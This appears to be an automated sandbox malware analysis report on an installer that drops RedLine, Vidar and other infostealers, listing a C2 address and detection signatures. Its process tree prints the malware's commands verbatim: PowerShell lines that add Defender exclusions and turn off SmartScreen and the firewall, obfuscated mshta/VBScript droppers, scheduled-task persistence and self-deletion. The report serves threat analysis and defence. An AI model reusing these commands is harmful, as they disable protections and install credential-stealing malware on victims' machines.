Resubmissions

08-10-2021 15:07

211008-shl8xsefa9 10

08-10-2021 05:38

211008-gbvqyadce8 10

07-10-2021 18:28

211007-w4jayacge3 10

Analysis

  • max time kernel
    763s
  • max time network
    1167s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    08-10-2021 05:38

General

  • Target

    setup_x86_x64_install.exe

  • Size

    5.9MB

  • MD5

    0308d3044eda0db671c58c2a97cb3c10

  • SHA1

    1737ab616a61d35b0bde0aaad949d9894e14be9e

  • SHA256

    b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072

  • SHA512

    29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e

Malware Config

Extracted

Family

redline

Botnet

media214

C2

91.121.67.60:2151

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 23 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Arkei Stealer Payload 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 15 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 25 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 45 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3532
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2340
      • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2512
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2584
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2952
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1988
          • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu166f9a8bbe80.exe
            Thu166f9a8bbe80.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2824
            • C:\Users\Admin\Pictures\Adobe Films\FrtT6nDxGGNaNQJGpSMuoIte.exe
              "C:\Users\Admin\Pictures\Adobe Films\FrtT6nDxGGNaNQJGpSMuoIte.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:3152
            • C:\Users\Admin\Pictures\Adobe Films\bdaapMn77MgXIJD9NqZPKirz.exe
              "C:\Users\Admin\Pictures\Adobe Films\bdaapMn77MgXIJD9NqZPKirz.exe"
              6⤵
              • Executes dropped EXE
              PID:5272
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 320
                7⤵
                • Program crash
                • Checks processor information in registry
                • Enumerates system info in registry
                PID:1724
            • C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe
              "C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"
              6⤵
              • Executes dropped EXE
              PID:5260
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                7⤵
                  PID:4504
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe" ) do taskkill /f /Im "%~nxQ"
                    8⤵
                      PID:1460
                      • C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE
                        ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9
                        9⤵
                          PID:5720
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                            10⤵
                              PID:4956
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
                                11⤵
                                  PID:4972
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL" ). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q * " , 0 , TrUE ) )
                                10⤵
                                  PID:3672
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *
                                    11⤵
                                      PID:1104
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        12⤵
                                          PID:3412
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"
                                          12⤵
                                            PID:6496
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                            12⤵
                                              PID:6488
                                            • C:\Windows\SysWOW64\control.exe
                                              control ..\SMD2fE1.N
                                              12⤵
                                                PID:6932
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                  13⤵
                                                  • Loads dropped DLL
                                                  PID:7044
                                                  • C:\Windows\system32\RunDll32.exe
                                                    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                    14⤵
                                                      PID:6268
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\SMD2fE1.N
                                                        15⤵
                                                        • Loads dropped DLL
                                                        PID:4356
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /Im "y1G8FfzF7rmhnTW5xkTk4_xz.exe"
                                            9⤵
                                            • Kills process with taskkill
                                            PID:5156
                                    • C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:5248
                                      • C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:3436
                                        • C:\Users\Admin\AppData\Local\Temp\filename.exe
                                          "C:\Users\Admin\AppData\Local\Temp\filename.exe"
                                          8⤵
                                          • Checks BIOS information in registry
                                          • Drops startup file
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:6088
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                            9⤵
                                            • Modifies security service
                                            • Adds Run key to start application
                                            PID:2496
                                            • C:\Windows\system32\netsh.exe
                                              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                              10⤵
                                                PID:4676
                                            • C:\Windows\system32\WerFault.exe
                                              C:\Windows\system32\WerFault.exe -u -p 6088 -s 2224
                                              9⤵
                                              • Program crash
                                              • Checks processor information in registry
                                              • Enumerates system info in registry
                                              PID:2028
                                      • C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks processor information in registry
                                        PID:5376
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe" & exit
                                          7⤵
                                            PID:3720
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 5
                                              8⤵
                                              • Delays execution with timeout.exe
                                              PID:2284
                                        • C:\Users\Admin\Pictures\Adobe Films\7wnnfVqm38XiveMNr17rrIJW.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\7wnnfVqm38XiveMNr17rrIJW.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5516
                                        • C:\Users\Admin\Pictures\Adobe Films\2Y0ax0F0iaoZKWHLwz824FmR.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\2Y0ax0F0iaoZKWHLwz824FmR.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5504
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            7⤵
                                              PID:1340
                                          • C:\Users\Admin\Pictures\Adobe Films\rq8aNCX_7GMzisMtY3v4FnzZ.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\rq8aNCX_7GMzisMtY3v4FnzZ.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5492
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 276
                                              7⤵
                                              • Program crash
                                              • Checks processor information in registry
                                              • Enumerates system info in registry
                                              PID:6944
                                          • C:\Users\Admin\Pictures\Adobe Films\gC0KbqHO3ZDxpp0jTvhCiFii.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\gC0KbqHO3ZDxpp0jTvhCiFii.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5472
                                            • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                              "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:1904
                                            • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                              "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:6028
                                            • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                              "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                              7⤵
                                                PID:5864
                                            • C:\Users\Admin\Pictures\Adobe Films\_9SCB5TlxeO2mPfwxR05MOev.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\_9SCB5TlxeO2mPfwxR05MOev.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:5456
                                            • C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5448
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe" & exit
                                                7⤵
                                                  PID:6528
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 5
                                                    8⤵
                                                    • Delays execution with timeout.exe
                                                    PID:6896
                                              • C:\Users\Admin\Pictures\Adobe Films\DxgHi7mCO9PoXuB9zH8BNOwz.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\DxgHi7mCO9PoXuB9zH8BNOwz.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5436
                                              • C:\Users\Admin\Pictures\Adobe Films\cJyGPEpQWwEhNzQK_Vj4k_0n.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\cJyGPEpQWwEhNzQK_Vj4k_0n.exe"
                                                6⤵
                                                  PID:5428
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 296
                                                    7⤵
                                                    • Program crash
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:6128
                                                • C:\Users\Admin\Pictures\Adobe Films\uLAUkLkggV2s3Qgdg9_4e6DG.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\uLAUkLkggV2s3Qgdg9_4e6DG.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:5548
                                                • C:\Users\Admin\Pictures\Adobe Films\JEi0h6D_gt3gktq40Td8HXMD.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\JEi0h6D_gt3gktq40Td8HXMD.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:5536
                                                • C:\Users\Admin\Pictures\Adobe Films\mL5RRfi8cNocBGUfqcRH0wRT.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\mL5RRfi8cNocBGUfqcRH0wRT.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:5880
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                    7⤵
                                                    • Loads dropped DLL
                                                    • Accesses Microsoft Outlook accounts
                                                    • Accesses Microsoft Outlook profiles
                                                    • outlook_office_path
                                                    • outlook_win_path
                                                    PID:3144
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      8⤵
                                                        PID:6316
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Delays execution with timeout.exe
                                                          PID:2776
                                                  • C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    PID:5700
                                                    • C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"
                                                      7⤵
                                                        PID:5176
                                                    • C:\Users\Admin\Pictures\Adobe Films\mSngUReAgA5wzBQ9dhAfBrS5.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\mSngUReAgA5wzBQ9dhAfBrS5.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:4732
                                                    • C:\Users\Admin\Pictures\Adobe Films\surHKlFIOl98IaTC679RP8rQ.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\surHKlFIOl98IaTC679RP8rQ.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6132
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 1736
                                                        7⤵
                                                        • Program crash
                                                        PID:5128
                                                    • C:\Users\Admin\Pictures\Adobe Films\XgEEoNZF6CBCJXeGL_a9D1b2.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\XgEEoNZF6CBCJXeGL_a9D1b2.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:6120
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 268
                                                        7⤵
                                                        • Program crash
                                                        PID:5224
                                                    • C:\Users\Admin\Pictures\Adobe Films\DR5vEkjduzexsi7Qja2_MjnT.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\DR5vEkjduzexsi7Qja2_MjnT.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:5320
                                                    • C:\Users\Admin\Pictures\Adobe Films\d_EYXTwqXMHtpnR8ybSMhjSy.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\d_EYXTwqXMHtpnR8ybSMhjSy.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5300
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 304
                                                        7⤵
                                                        • Program crash
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:5136
                                                    • C:\Users\Admin\Pictures\Adobe Films\lAbjHswwfcK8SfQWhuS3AA4p.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\lAbjHswwfcK8SfQWhuS3AA4p.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:1556
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        7⤵
                                                          PID:3596
                                                      • C:\Users\Admin\Pictures\Adobe Films\EprQIfWVrwBTpRY1DxBx2pcO.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\EprQIfWVrwBTpRY1DxBx2pcO.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4696
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                          7⤵
                                                          • Creates scheduled task(s)
                                                          PID:2640
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                          7⤵
                                                          • Creates scheduled task(s)
                                                          PID:5340
                                                        • C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
                                                          "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
                                                          7⤵
                                                            PID:2032
                                                            • C:\Users\Admin\Pictures\Adobe Films\10uvxfFDbQOvHTv_6X_00nqe.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\10uvxfFDbQOvHTv_6X_00nqe.exe"
                                                              8⤵
                                                                PID:6652
                                                              • C:\Users\Admin\Pictures\Adobe Films\piKEQ_2ZoG808LDM2Govt_1j.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\piKEQ_2ZoG808LDM2Govt_1j.exe"
                                                                8⤵
                                                                  PID:5788
                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe"
                                                                    9⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:724
                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe
                                                                      10⤵
                                                                        PID:4564
                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:1244
                                                                  • C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"
                                                                    8⤵
                                                                      PID:2020
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
                                                                        9⤵
                                                                          PID:1392
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe" ) do taskkill /f -Im "%~nXw"
                                                                            10⤵
                                                                              PID:2504
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f -Im "oMnd8HW8cwFc0YultdzLDnwG.exe"
                                                                                11⤵
                                                                                • Kills process with taskkill
                                                                                PID:5480
                                                                              • C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE
                                                                                ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd
                                                                                11⤵
                                                                                  PID:6808
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
